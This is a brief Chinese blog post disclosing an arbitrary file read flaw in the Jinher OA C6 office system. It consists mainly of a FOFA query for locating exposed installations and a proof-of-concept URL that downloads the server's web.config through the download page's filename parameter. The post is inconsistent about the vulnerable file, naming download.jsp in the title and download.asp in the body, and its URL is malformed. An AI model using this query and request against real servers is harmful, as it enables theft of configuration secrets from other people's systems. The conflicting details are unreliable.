金和OA C6 download.jsp 任意文件读取漏洞

金和OA C6 download.jsp 任意文件读取漏洞

漏洞描述

金和OA C6 download.jsp文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感信息

漏洞影响

金和OA

FOFA

app="Jinher-OA"

漏洞产生文件为 download.asp

POC构造
http//:x.x.x.x/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
随后就下载一个Web.config文件

END!!!

posted @ 2022-05-18 16:48 我就去睡觉阅读(1897) 评论(0) 编辑收藏举报

刷新页面返回顶部